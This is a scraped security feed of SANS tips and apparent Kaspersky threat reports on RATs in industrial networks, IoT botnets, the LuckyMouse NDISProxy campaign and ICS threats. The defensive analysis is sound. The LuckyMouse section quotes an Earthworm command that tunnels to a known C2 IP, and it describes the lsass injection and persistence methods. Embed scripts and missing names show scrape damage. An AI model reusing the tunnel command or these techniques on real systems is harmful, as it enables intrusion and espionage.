SANS Tip of the Day - Tue, 09/25/2018 - 01:00
Be aware of all the devices connected to your home network, including baby monitors, gaming consoles, TVs, appliances or even your car. Ensure all those devices are protected by a strong password and/or are running the latest version of their operating system.

Kids and Family Members

SANS Tip of the Day - Fri, 09/21/2018 - 01:00
If you have children visiting or staying with family members (such as grandparents), make sure the family members know your rules concerning technology that your kids must follow. Just because your kids leave the house does not mean the rules about what they can do online change.

Threats posed by using RATs in ICS

Malware Alerts - Thu, 09/20/2018 - 06:00

While conducting audits, penetration tests and incident investigations, we have often come across legitimate remote administration tools (RAT) for PCs installed on operational technology (OT) networks of industrial enterprises. In a number of incidents that we have investigated, threat actors had used RATs to attack industrial organizations. In some cases, the attackers had stealthily installed RATs on victim organizations’ computers, while in other cases, they had been able to use the RATs that were installed in the organization at the time of the attacks. These observations prompted us to analyze the scope of the threat, including the incidence of RATs on industrial networks and the reasons for using them.


The statistical data presented in this paper was collected using the Kaspersky Security Network (KSN) from ICS computers protected by Kaspersky Lab products that Kaspersky Lab ICS CERT categorizes as part of the industrial infrastructure at organizations. This group includes Windows computers that perform one or several of the following functions:

  • supervisory control and data acquisition (SCADA) servers;
  • data storage servers (Historian);
  • data gateways (OPC);
  • stationary workstations of engineers and operators;
  • mobile workstations of engineers and operators;
  • Human Machine Interface (HMI).

As part of our research, we considered and analyzed all popular RATs for Windows, with the exception of Remote Desktop, which is part of the Windows operating system. Our research into this RAT is ongoing and will be presented in the next paper of the series.

The use of RATs in ICS

According to KSN data, in the first half of 2018, legitimate RATs (programs categorized as not-a-virus: RemoteAdmin) were installed and used on one ICS computer in three.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","");

Percentage of ICS computers that have RATs legitimately installed on them (download)

The statistics support our observations: RATs are indeed often used on OT networks of industrial enterprises. We believe this could be due to attempts to reduce costs associated with maintaining ICS and minimize the response time in the event of malfunction.

As we were able to find out, remote access to computers on the OT network is not restricted to administrators and engineers inside the enterprise network’s perimeter. It can also be made available via the internet to users outside the enterprise network perimeter. Such users can include representatives of third-party enterprises – employees of system integrators or ICS vendors, who use RATs for diagnostics, maintenance and to address any ICS malfunctions. As our industrial network security audits have shown, such access is often poorly supervised by the enterprise’s responsible employees, while remote users connecting to the OT network often have excessive rights, such as local administrator privileges, which is obviously a serious issue in terms of ensuring the information security of industrial automation systems.

From interviews with engineers and operators of various industrial systems that we have audited, and based on an analysis of ICS user documentation, we have determined that RATs are most commonly used on industrial networks according to the following scenarios:

  1. To control/monitor HMI from an operator workstation (including displaying information on a large screen);
  2. To control/maintain HMI from an engineering workstation;
  3. To control SCADA from an operator workstation;
  4. To provide SCADA maintenance from an engineering workstation or a computer of a contractor/vendor (from an external network);
  5. To connect multiple operators to one operator workstation (thin client-like architecture used to save money on licenses for the software used on operator workstations);
  6. To connect to a computer on the office network from the OT network via HMI and perform various tasks on that computer (access email, access the internet, work with office documents, etc.).

Some of the scenarios listed above indicate that the use of RATs on the OT network can be explained by operational requirements, which means that giving up the use of RATs would unavoidably entail modifications to work processes. At the same time, it is important to realize that an attack on a poorly protected RAT could easily cause disruptions to the industrial process and any decisions on using RATs on the OT network should be made with this in mind. Tight controls on the use of RATs on the OT network would help to reduce the attack surface and the risk of infection for systems administered remotely.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","");

TOP 20 countries by percentage of ICS computers on which RATs were used at least once during the first half of 2018 (to all ICS computers in each country) (download)

Scenarios of RAT installation on ICS computers

According to our research, there are three most common scenarios of RAT installation on ICS computers:

  1. Installation of ICS software distribution packages that include RATs (using separate distribution packages or ICS software installers). RATs included in ICS software distribution packages make up 18.6% of all RATs we have identified on ICS computers protected by Kaspersky Lab products.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","");

Percentage of RATs bundled with ICS products to all RATs found on ICS computers (download)

  1. Deliberate installation of RATs by personnel or suppliers – network administrators, engineers, operators, or integrator companies. We do not undertake to judge whether these installations are legitimate. Based on our experience of industrial network audits and incident investigation, we can state that many such installations do not comply with the organization’s information security policy and some are installed without the knowledge of respective enterprises’ responsible employees.
  2. Stealthy installation of RATs by malware. An example of this is a recent attack that we have investigated (see below).
RAT-related threats to ICS

Threats associated with the use of RATs on industrial networks are not always obvious, nor are the reasons for which RATs are used.

Most of the RATs we have identified on industrial systems have the following characteristics that significantly reduce the security level of the host system:

  • Elevated privileges – the server part of a RAT is often executed as a service with system privileges, i.e., NT SYSTEM;
  • No support for restricting local access to the system / client activity;
  • Single-factor authentication;
  • No logging of client activity;
  • Vulnerabilities (our report on zero-day vulnerabilities identified in popular RAT systems that are used, among other applications, in products by many ICS vendors, will be published by the end of the year);
  • The use of relay servers (for reverse connections) that enable RATs to bypass NAT and firewall restrictions on the network perimeter.

The most critical RAT-related problem is the use of elevated privileges and the absence of any means to limit these privileges (or to restrict a remote user’s local access). In practice, this means that if attackers (or malware) gain access to a remote user’s computer, steal authentication data (login/password), hijack an active remote administration session or successfully attack a vulnerability in the RAT’s server part, they will gain unrestricted control of the ICS system. By using relay servers for reverse connections, attackers can also connect to these RATs from anywhere in the world.

There are also other issues that affect RATs built into ICS software distribution packages:

  • RAT components and distribution packages are rarely updated (even if new versions of ICS distribution packages are released). This makes them more likely to contain vulnerabilities;
  • In the vast majority of cases, the default password is used – it is either hardcoded into the RAT by the ICS software vendor or specified in the documentation as “recommended”.

RATs are legitimate software tools that are often used on industrial networks, which means it can be extremely difficult to distinguish attacks involving RATs from legitimate activity. In addition, since the information security service and other employees responsible for ICS security are often unaware that a RAT is installed, the configuration of RATs is in most cases not analyzed when auditing the security of an industrial network. This makes it particularly important to control by whom, when and for what purposes RATs are used on the industrial network and to ensure that it is completely impossible to use RATs without the knowledge of employees responsible for the OT network’s information security.

Attacks of threat actors involving RATs

Everything written above applies to potential threats associated with the use of RATs.

Based on our analysis of KSN statistics, we were able to identify a number of attacks and malware infection attempts involving RATs installed on ICS computers. In most cases, attacks were based on the following scenarios (in the descending order of attack incidence):

  1. A brute force network attack from the local network or the internet designed to crack logins/passwords;
  2. An attacker or malware using a RAT to download and execute malware using stolen or cracked authentication credentials;
  3. A remote user (probably a legitimate user deceived by attackers) using a RAT to download a Trojan to an ICS computer and then executing it; the Trojan can be disguised as an office document, non-industrial software (a game, multimedia software, etc.), a crack/keygen for office, application or industrial software, etc.;
  4. A network attack from the local network or the internet on the server part of the RAT using exploits.

Brute force type network attacks (designed to crack logins/passwords) are the most common: their implementation does not require any special knowledge or skills and the software used in such attacks is publicly available.

It cannot be determined based on available data who connects to a RAT’s server part installed on an ICS computer – a legitimate user, an attacker or malware – or why. Consequently, we can only guess whether this activity represents a targeted attack, sabotage attempts or a client’s error.

Network attacks from the internet were most probably conducted by threat actors using malware, penetration testing tools or botnets.

Network attacks from the local network could indicate the presence of attackers (possibly including an insider) on the network. Another possibility is that there is a compromised computer on the local network that is either infected with malware or is used by the attacker as a point of presence (if the authentication credentials were compromised earlier).

Attacks on industrial enterprises using RMS and TeamViewer

In the first half of 2018, Kaspersky Lab ICS CERT identified a new wave of phishing emails disguised as legitimate commercial offers. Although the attacks targeted primarily industrial companies within the territory of Russia, the same tactics and tools can be used in attacks on industrial companies in any country of the world.

The malware used in these attacks installs legitimate remote administration software on the system — TeamViewer or Remote Manipulator System/Remote Utilities (RMS). In both cases, a system DLL is replaced with a malicious library to inject malicious code into a legitimate program’s process. This provides the attackers with remote control of the infected systems. Various techniques are used to mask the infection and the activity of the software installed on the system.

If necessary, the attackers download an additional malware pack to the system, which is specifically tailored to the attack on each individual victim. This set of malware may contain spyware, additional remote administration tools that extend the threat actor’s control of infected systems, malware to exploit vulnerabilities in the operating system and application software, as well as the Mimikatz utility, which makes it possible to obtain account data for Windows accounts.

According to available data, the attackers’ main goal is to steal money from victim organizations’ accounts, but possible attack scenarios are not limited to the theft of funds. In the process of attacking their targets, the attackers steal sensitive data belonging to target organizations, their partners and customers, carry out surreptitious surveillance of the victim companies’ employees, and record audio and video using devices connected to infected machines. Clearly, on top of the financial losses, these attacks result in leaks of victim organizations’ sensitive data.

Multiple attacks on an auto manufacturer

A characteristic example of attacks based on the second scenario was provided by attacks on the industrial network of a motor vehicle manufacturing and service company, in particular, on computers designed to diagnose the engines and onboard systems of trucks and heavy-duty vehicles. Multiple attempts to conduct such attacks were blocked by Kaspersky Lab products.

A RAT was installed and intermittently used on at least one of the computers in the company’s industrial network. Starting in late 2017, numerous attempts to launch various malicious programs using the RAT were blocked on the computer. Infection attempts were made regularly over a period of several months – 2-3 times a week, at different times of the day. Based in part on other indirect indicators, we believe that RAT authentication data was compromised and used by attackers (or malware) to attack the enterprise’s computers over the internet.

After gaining access to the potential victim’s infrastructure via the RAT, the attackers kept trying to choose a malicious packer that would enable them to evade antivirus protection.

The blocked programs included modifications of the malware detected by Kaspersky Lab products as When launched this worm immediately begins to proliferate on the local network using exploits for the MS17-010 vulnerabilities – the same ones that were published by ShadowBrokers in the spring of 2017 and were used in attacks by the infamous WannaCry and ExPetr cryptors.

The Nymaim Trojan family was also blocked. Representatives of this family are often used to download modifications of botnet agents from the Necus family, which in turn have often been used to infect computers with ransomware from the Locky family.


Remote administration tools are widely used on industrial networks for ICS monitoring, control and maintenance. The ability to manipulate the ICS remotely significantly reduces maintenance costs, but at the same time, uncontrolled remote access, the inability to provide 100% verification of the remote client’s legitimacy, and the vulnerabilities in RAT code and configuration significantly increase the attack surface. At the same time, RATs, along with other legitimate tools, are increasingly used by attackers to mask malicious activity and make attribution more difficult.

To reduce the risk of cyberattacks involving RATs, we recommend the following high-priority measures:

  • Audit the use of application and system remote administration tools on the industrial network, such as VNC, RDP, TeamViewer, and RMS / Remote Utilities. Remove all remote administration tools that are not required by the industrial process.
  • Conduct an audit and disable remote administration tools which came with ICS software (refer to the relevant software documentation for detailed instructions), provided that they are not required by the industrial process.
  • Closely monitor and log events for each remote control session required by the industrial process; remote access should be disabled by default and enabled only upon request and only for limited periods of time.

New trends in the world of IoT threats

Malware Alerts - Tue, 09/18/2018 - 06:00

Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.

We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","");

Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018. (download)

One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our honeypots than all other types combined.

service % of attacks Telnet 75.40% SSH 11.59% other 13.01%

When it came to downloading malware onto IoT devices, cybercriminals’ preferred option was one of the Mirai family (20.9%).

# downloaded malware % of attacks 1 Backdoor.Linux.Mirai.c 15.97% 2 Trojan-Downloader.Linux.Hajime.a 5.89% 3 Trojan-Downloader.Linux.NyaDrop.b 3.34% 4 Backdoor.Linux.Mirai.b 2.72% 5 1.94% 6 Trojan-Downloader.Shell.Agent.p 0.38% 7 0.27% 8 Backdoor.Linux.Mirai.n 0.27% 9 0.24% 10 0.20%

Top 10 malware downloaded onto infected IoT device following a successful Telnet password crack

And here are the Top 10 countries from which our traps were hit by Telnet password attacks:

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","");

Geographical distribution of the number of infected devices, Q2 2018. (download)

As we see, in Q2 2018 the leader by number of unique IP addresses from which Telnet password attacks originated was Brazil (23%). Second place went to China (17%). Russia in our list took 4th place (7%). Overall for the period January 1 – July 2018, our Telnet honeypot registered more than 12 million attacks from 86,560 unique IP addresses, and malware was downloaded from 27,693 unique IP addresses.

Since some smart device owners change the default Telnet password to one that is more complex, and many gadgets don’t support this protocol at all, cybercriminals are constantly on the lookout for new ways of infection. This is stimulated by the high competition between virus writers, which has led to password bruteforce attacks becoming less effective: in the event of a successful crack, the device password is changed and access to Telnet is blocked.

An example of the use of “alternative technology” is the Reaper botnet, whose assets at end-2017 numbered about 2 million IoT devices. Instead of bruteforcing Telnet passwords, this botnet exploited known software vulnerabilities:

Advantages of this distribution method over password cracking:

  • Infection occurs much faster
  • It is much harder to patch a software vulnerability than change a password or disable/block the service

Although this method is more difficult to implement, it found favor with many virus writers, and it wasn’t long before new Trojans exploiting known vulnerabilities in smart device software started appearing.

New attacks, old malware

To see which vulnerabilities are targeted by malware, we analyzed data on attempts to connect to various ports on our traps. This is the picture that emerged for Q2 2018:

Service Port % of attacks Attack vector Malware families Telnet 23, 2323 82.26% Bruteforce Mirai, Gafgyt SSH 22 11.51% Bruteforce Mirai, Gafgyt Samba 445 2.78% EternalBlue, EternalRed, CVE-2018-7445 – tr-069 7547 0.77% RCE in TR-069 implementation Mirai, Hajime HTTP 80 0.76% Attempts to exploit vulnerabilities in a web server or crack an admin console password – winbox (RouterOS) 8291 0.71% Used for RouterOS (MikroTik) authentication and WinBox-based attacks Hajime Mikrotik http 8080 0.23% RCE in MikroTik RouterOS < 6.38.5 Chimay-Red Hajime MSSQL 1433 0.21% Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft – GoAhead httpd 81 0.16% RCE in GoAhead IP cameras Persirai, Gafgyt Mikrotik http 8081 0.15% Chimay-Red Hajime Etherium JSON-RPC 8545 0.15% Authorization bypass (CVE-2017-12113)RDP 3389 0.12% Bruteforce – XionMai uc-httpd 8000 0.09% Buffer overflow (CVE-2018-10088) in XionMai uc-httpd 1.0.0 (some Chinese-made devices) Satori MySQL 3306 0.08% Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft –

The vast majority of attacks still come from Telnet and SSH password bruteforcing. The third most common are attacks against the SMB service, which provides remote access to files. We haven’t seen IoT malware attacking this service yet. However, some versions of it contain serious known vulnerabilities such as EternalBlue (Windows) and EternalRed (Linux), which were used, for instance, to distribute the infamous Trojan ransomware WannaCry and the Monero cryptocurrency miner EternalMiner.

Here’s the breakdown of infected IoT devices that attacked our honeypots in Q2 2018:

Device % of infected devices MikroTik 37.23% TP-Link 9.07% SonicWall 3.74% AV tech 3.17% Vigor 3.15% Ubiquiti 2.80% D-Link 2.49% Cisco 1.40% AirTies 1.25% Cyberoam 1.13% HikVision 1.11% ZTE 0.88% Miele 0.68% Unknown DVR 31.91%

As can be seen, MikroTik devices running under RouterOS are way out in front. The reason appears to be the Chimay-Red vulnerability. What’s interesting is that our honeypot attackers included 33 Miele dishwashers (0.68% of the total number of attacks). Most likely they were infected through the known (since March 2017) CVE-2017-7240 vulnerability in PST10 WebServer, which is used in their firmware.

Port 7547

Attacks against remote device management (TR-069 specification) on port 7547 are highly common. According to Shodan, there are more than 40 million devices in the world with this port open. And that’s despite the vulnerability recently causing the infection of a million Deutsche Telekom routers, not to mention helping to spread the Mirai and Hajime malware families.

Another type of attack exploits the Chimay-Red vulnerability in MikroTik routers running under RouterOS versions below 6.38.4. In March 2018, it played an active part in distributing Hajime.

IP cameras

IP cameras are also on the cybercriminal radar. In March 2017, several major vulnerabilities were detected in the software of GoAhead devices, and a month after information about it was published, there appeared new versions of the Gafgyt and Persirai Trojans exploiting these vulnerabilities. Just one week after these malicious programs were actively distributed, the number of infected devices climbed to 57,000.

On June 8, 2018, a proof-of-concept was published for the CVE-2018-10088 vulnerability in the XionMai uc-httpd web server, used in some Chinese-made smart devices (for example, KKMoon DVRs). The next day, the number of logged attempts to locate devices using this web server more than tripled. The culprit for this spike in activity was the Satori Trojan, known for previously attacking GPON routers.

New malware and threats to end users DDoS attacks

As before, the primary purpose of IoT malware deployment is to perpetrate DDoS attacks. Infected smart devices become part of a botnet that attacks a specific address on command, depriving the host of the ability to correctly handle requests from real users. Such attacks are still deployed by Trojans from the Mirai family and its clones, in particular, Hajime.

This is perhaps the least harmful scenario for the end user. The worst (and very unlikely) thing that can happen to the owner of the infected device is being blocked by their ISP. And the device can often by “cured” with a simple reboot.

Cryptocurrency mining

Another type of payload is linked to cryptocurrencies. For instance, IoT malware can install a miner on an infected device. But given the low processing power of smart devices, the feasibility of such attacks remains in doubt, even despite their potentially large number.

A more devious and doable method of getting a couple of cryptocoins was invented by the creators of the Satori Trojan. Here, the victim IoT device acts as a kind of key that opens access to a high-performance PC:

  • At the first stage, the attackers try to infect as many routers as possible using known vulnerabilities, in particular:
    • CVE-2014-8361 – RCE in the miniigd SOAP service in Realtek SDK
    • CVE 2017-17215 – RCE in the firmware of Huawei HG532 routers
    • CVE-2018-10561, CVE-2018-10562 – authorization bypass and execution of arbitrary commands on Dasan GPON routers
    • CVE-2018-10088 – buffer overflow in XiongMai uc-httpd 1.0.0 used in the firmware of some routers and other smart devices made by some Chinese manufacturers
  • Using compromised routers and the CVE-2018-1000049 vulnerability in the Claymore Etherium miner remote management tool, they substitute the wallet address for their own.
Data theft

The VPNFilter Trojan, detected in May 2018, pursues other goals, above all intercepting infected device traffic, extracting important data from it (user names, passwords, etc.), and sending it to the cybercriminals’ server. Here are the main features of VPNFilter:

  • Modular architecture. The malware creators can fit it out with new functions on the fly. For instance, in early June 2018 a new module was detected able to inject javascript code into intercepted web pages.
  • Reboot resistant. The Trojan writes itself to the standard Linux crontab job scheduler, and can also modify the configuration settings in the non-volatile memory (NVRAM) of the device.
  • Uses TOR for communication with C&C.
  • Able to self-destruct and disable the device. On receiving the command, the Trojan deletes itself, overwrites the critical part of the firmware with garbage data, and then reboots the device.

The Trojan’s distribution method is still unknown: its code contains no self-propagation mechanisms. However, we are inclined to believe that it exploits known vulnerabilities in device software for infection purposes.

The very first VPNFilter report spoke of around 500,000 infected devices. Since then, even more have appeared, and the list of manufacturers of vulnerable gadgets has expanded considerably. As of mid-June, it included the following brands:

  • ASUS
  • D-Link
  • Huawei
  • Linksys
  • MikroTik
  • Netgear
  • QNAP
  • TP-Link
  • Ubiquiti
  • Upvel
  • ZTE

The situation is made worse by the fact that these manufacturers’ devices are used not only in corporate networks, but often as home routers.


Smart devices are on the rise, with some forecasts suggesting that by 2020 their number will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average user. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage Internet traffic, others shoot video footage, still others control domestic devices (for example, air conditioning).

Malware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to steal personal data and mine cryptocurrencies, on top of traditional DDoS attacks.

Here are some simple tips to help minimize the risk of smart device infection:

  • Don’t give access to the device from an external network unless absolutely necessary
  • Periodic rebooting will help get rid of malware already installed (although in most cases the risk of reinfection will remain)
  • Regularly check for new firmware versions and update the device
  • Use complex passwords at least 8 characters long, including upper and lower-case letters, numerals, and special characters
  • Change the factory passwords at initial setup (even if the device does not prompt you to do so)
  • Close/block unused ports, if there is such an option. For example, if you don’t connect to the router via Telnet (port TCP:23), it’s a good idea to disable it so as to close off a potential loophole to intruders.

Trust Your Instincts

SANS Tip of the Day - Tue, 09/18/2018 - 01:00
Ultimately, common sense is your best protection. If an email, phone call or online message seems odd, suspicious or too good to be true, it may be an attack.

Social Media Privacy Settings

SANS Tip of the Day - Fri, 09/14/2018 - 01:00
Privacy settings on social networks have limited value. They are confusing to configure and change often. Ultimately, if you do not want your parents or boss reading it, do not post it.

LuckyMouse signs malicious NDISProxy driver with certificate of Chinese IT company

Malware Alerts - Mon, 09/10/2018 - 06:00

What happened?

Since March 2018 we have discovered several infections where a previously unknown Trojan was injected into the lsass.exe system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT.

The campaign described in this report was active immediately prior to Central Asian high-level meeting and we suppose that actor behind still follows regional political agenda.

Which malicious modules are used?

The malware consists of three different modules:

  • A custom C++ installer that decrypts and drops the driver file in the corresponding system directory, creates a Windows autorun service for driver persistence and adds the encrypted in-memory Trojan to the system registry.
  • A network filtering driver (NDISProxy) that decrypts and injects the Trojan into memory and filters port 3389 (Remote Desktop Protocol, RDP) traffic in order to insert the Trojan’s C2 communications into it.
  • A last-stage C++ Trojan acting as HTTPS server that works together with the driver. It waits passively for communications from its C2, with two possible communication channels via ports 3389 and 443.

NDISProxy driver and RAT work together once the installer has set up all the modules

These modules allow attackers to silently move laterally in the infected infrastructure, but don’t allow them to communicate with an external C2 if the new infected host only has a LAN IP. Because of this, the operators used an Earthworm SOCKS tunneler in order to connect the LAN of the infected host to the external C2. They also used the Scanline network scanner to find file shares (port 135, Server Message Block, SMB) which they use to spread malware with administrative passwords, compromised with keyloggers.

We assess with high confidence that NDISProxy is a new tool used by LuckyMouse. Kaspersky Lab products detect the described artefacts. For more information please contact:

How does it spread?

We detected the distribution of the 32-bit dropper used for this campaign among different targets by the end of March 2018. However, we didn’t observe any spear phishing or watering hole activity. We believe the operators spread their infectors through networks that were already compromised instead.

How does it work? Custom installer Installer MD5 hash Timestamp (GMT) Size Bits dacedff98035f80711c61bc47e83b61d 2018.03.29 07:35:55 572 244 32 9dc209f66da77858e362e624d0be86b3 2018.03.26 04:16:00 572 244 32 3cbeda2c5ac41cca0b0d60376a2b2511 2018.03.26 04:16:00 307 200 32

The initial infectors are 32-bit portable executable files capable of installing 32-bit or 64-bit drivers depending on the target. The installer logs all the installation process steps in the load.log file within the same directory. It checks if the OS is Windows Vista or above (major version equal to 6 or higher) and decrypts its initial configuration using the DES (Data Encryption Standard) algorithm.

The set of well-known port numbers (HTTP, HTTPS, SMB, POP3S, MSSQL, PPTP and RDP) in the configuration is not used, which along with the “[test]” strings in messages suggests this malware is still under development.

The installer creates a semaphore (name depending on configuration) Global\Door-ndisproxy-mn and checks if the service (name also depends on configuration) ndisproxy-mn is already installed. If it is, the dropper writes “door detected” in load.log. The autorun Windows service running NDISProxy is the “door” in developer terms.

The installer also decrypts (using the same DES) the shellcode of the last stage Trojan and saves it in three registry values named xxx0, xxx1, xxx2 in key HKLM\SOFTWARE\Classes\32ndisproxy-mn (or 64ndisproxy-mn for 64-bit hosts). The encrypted configuration is saved as the value filterpd-ndisproxy-mn in the registry key HKCR\ndisproxy-mn.

Initial installer saves XOR-encrypted Trojan’s shellcode and DES-encrypted configuration in system registry

The installer creates the corresponding autostart service and registry keys. The “Altitude” registry value (unique ID for the minifilter driver) is set to 321 000, which means “FSFilter Anti-Virus” in Windows terms:

NDISProxy network filtering driver Driver MD5 hash Timestamp Size Bits 8e6d87eadb27b74852bd5a19062e52ed 2018.03.29 07:33:58 40400 64 d21de00f981bb6b5094f9c3dfa0be533 2018.03.29 07:33:52 33744 32 a2eb59414823ae00d53ca05272168006 2018.03.26 04:15:28 40400 64 493167e85e45363d09495d0841c30648 2018.03.26 04:15:21 33744 32 ad07b44578fa47e7de0df42a8b7f8d2d 2017.11.08 08:04:50 241616 64

This digitally signed driver is the most interesting artefact used in this campaign. The network filtering modules serve two purposes: first they decrypt and inject the RAT; second, they set its communication channel through RDP port 3389.

The drivers are signed with a digital certificate issued by VeriSign to LeagSoft, a company developing information security software such as data loss prevention (DLP) solutions.

This driver makes extensive use of third-party publicly available C source code, including from the Blackbone repository available at GitHub.

Feature Public repository Driver memory injection Blackbone NDIS network filtering driver Microsoft Windows Driver Kit (WDK) sample code “Windows Filtering Platform Stream Edit Sample/C++/sys/stream_callout.c” Parse HTTP packets Http-parser

The driver again checks if the Windows version is higher than Vista, then creates a device named \\Device\\ndisproxy-%s (where the word after “-” varies – see Appendix for all variants) and its corresponding symbolic link \\DosDevices\\Global\\ndisproxy-%s.

The driver combines all the Trojan-related registry values from HKLM\SOFTWARE\Classes\32ndisproxy-mn and de-XORs them with a six-byte hardcoded value. It then injects the resulting Trojan executable shellcode into lsass.exe memory using Blackbone library functions.

NDISProxy works as a network traffic filter engine, filtering the traffic going through RDP port 3389 (the port number is hardcoded) and injecting messages into it.

The communication between the user-mode in-memory Trojan and the driver goes through the custom control codes used by the DeviceIoControl() Windows API function. Apart from the auxiliary codes, there are two codes worth mentioning:

Driver control code Meaning 0x222400 Start traffic filtering at RDP port 3389 0x22240C Inject given data into filtering TCP stream. Used for Trojan communication with C2 In-memory C++ Trojan SHA256 c69121a994ea8ff188510f41890208625710870af9a06b005db817934b517bc1 MD5 6a352c3e55e8ae5ed39dc1be7fb964b1 Compiled 2018.03.26 04:15:48 (GMT) Type I386 Windows GUI DLL Size 175 616

Please note this Trojan exists in memory only; the data above is for the decrypted Windows registry content without the initial shellcode

This RAT is decrypted by the NDISProxy driver from the system registry and injected into the lsass.exe process memory. Code starts with a shellcode – instead of typical Windows portable executable files loader this malware implements memory mapping by itself.

This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first stage custom installer utilizes the same classes. The Trojan uses HTTP Server API to filter HTTPS packets at port 443 and parse commands.

The Trojan is an HTTP server, allowing LAN connection. It uses a SOCKS tunneler to communicate with the C2

This Trojan is used by attackers to gather a target’s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler. This tool is publicly available and popular among Chinese-speaking actors. Given that the Trojan is an HTTPS server itself, we believe that the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.

Who’s behind it and why?

We found that this campaign targeted Middle Asian governments’ entities. We believe the attack was highly targeted and was linked to a high-level meeting. We assess with high confidence that the Chinese-speaking LuckyMouse actor is responsible for this new campaign using the NDISProxy tool described in this report.

In particular, the choice of the Earthworm tunneler is typical for Chinese-speaking actors. Also, one of the commands used by the attackers (“-s rssocks -d 103.75.190[.]28 -e 443”) creates a tunnel to a previously known LuckyMouse C2. The choice of victims in this campaign also aligns with the previous interests shown by this actor.

Consistent with current trends

We have observed a gradual shift in several Chinese-speaking campaigns towards a combination of publicly available tools (such as Metasploit or CobaltStrike) and custom malware (like the C++ last stage RAT described in this report). We have also observed how different actors adopt code from GitHub repositories on a regular basis. All this combines to make attribution more difficult.

This campaign appears to demonstrate once again LuckyMouse’s interest in Central Asia and the political agenda surrounding the Shanghai Cooperation Organization.

Indicators of Compromise

Note: The indicators in this section are valid at the time of publication. Any future changes will be updated directly in the corresponding .ioc file.

File Hashes



Auxiliary Earthworm SOCKS tunneler and Scanline network scanner

Domains and IPs






Registry keys and values


Driver certificate

A lot of legitimate LeagSoft products are signed with the following certificate. Please don’t consider all signed files as malicious.

Subject ShenZhen LeagSoft Technology Co.,Ltd. Serial number 78 62 07 2d dc 75 9e 5f 6a 61 4b e9 b9 3b d5 21 Issuer VeriSign Class 3 Code Signing 2010 CA Valid to 2018-07-19

Threat Landscape for Industrial Automation Systems in H1 2018

Malware Alerts - Thu, 09/06/2018 - 06:00

For many years, Kaspersky Lab experts have been uncovering and researching cyberthreats that target a variety of information systems – those of commercial and government organizations, banks, telecoms operators, industrial enterprises, and individual users. In this report, Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT) publishes the findings of its research on the threat landscape for industrial automation systems conducted during the first half of 2018.

The main objective of these publications is to provide information support to global and local incident response teams, enterprise information security staff and researchers in the area of industrial facility security.

Key events Energetic Bear/Crouching Yeti: attacks on servers

In February, Kaspersky Lab ICS CERT published a report on an investigation into the initial infection tactics used by the notorious APT group Energetic Bear/Crouching Yeti, as well as the results of an analysis of several web servers compromised by the group in 2016 and early 2017, using information provided by the server owners.

Energetic Bear/Crouching Yeti has been active since at least 2010, attacking companies and individuals in various countries. The specialists at CrowdStrike initially noted a strong focus on the energy and industrial sectors, which may explain the name Energetic Bear. Later, when the diversity of the group’s attacks became clearer, the researchers at Kaspersky Lab named it Crouching Yeti. The targets of the attacks are mainly concentrated in Europe and the US. Recently, the number of attacks on companies in Turkey increased significantly. According to US-CERT and the UK National Cyber Security Centre, the Energetic Bear/Crouching Yeti APT group is linked to the Russian government.

The initial infection tactics used by the group is a multi-step process that begins with phishing emails being sent out with malicious documents and infecting various servers. Some infected servers are used by the group as auxiliaries – used only for hosting various tools. Others are infected so they can be used in watering hole attacks, with some servers hosting an SMB link that leads to other servers that steal the authentication data of potential victims.

